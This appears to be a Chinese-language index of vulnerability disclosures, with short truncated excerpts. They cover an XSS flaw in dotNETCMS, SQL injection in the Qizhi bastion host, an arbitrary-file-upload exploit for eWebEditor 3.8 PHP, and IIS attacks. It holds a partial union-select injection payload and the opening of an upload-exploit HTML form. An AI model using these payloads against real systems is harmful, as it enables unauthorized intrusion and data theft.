-
风讯dotNETCMS 1.0 SP5XSS漏洞
简要描述:由于程序未对用户提交的数据进行过滤,导致XSS漏洞。 详细说明:漏洞文件:stat/mystat.aspx document.write("<script>var code='<%=code%>...
-
奇智堡垒机V2.1存在搜索框注入
奇智堡垒机存在搜索框注入,通过1%')/**/and/**/1=2/**/union/**/select/**/null,version(),null,null,null,null,null,null— 1%');copy/**...
-
eWebeditoR3.8 for php任意文件上传EXP
<title>eWebeditoR3.8 for php任意文件上EXP</title><form action="" method=post enctype="multipar...
-
ewebeditor PHP 3.8版本上传任意文件0day
PHP版本的ewebeditor用的比ASP版本的少EXP如下:<title>eWebeditoR3.8 for php任意文件上EXP</title><form action="" met...
-
IIS常见漏洞攻防
IIS服务器 (IIS) 是一个包含在Microsoft Windows NT服务器操作系统中的Internet文件Microsoft Internet 信息和应用程序服务器。IIS可以作为一个Web 服务器单独使用,也可以与相兼容的工具一...
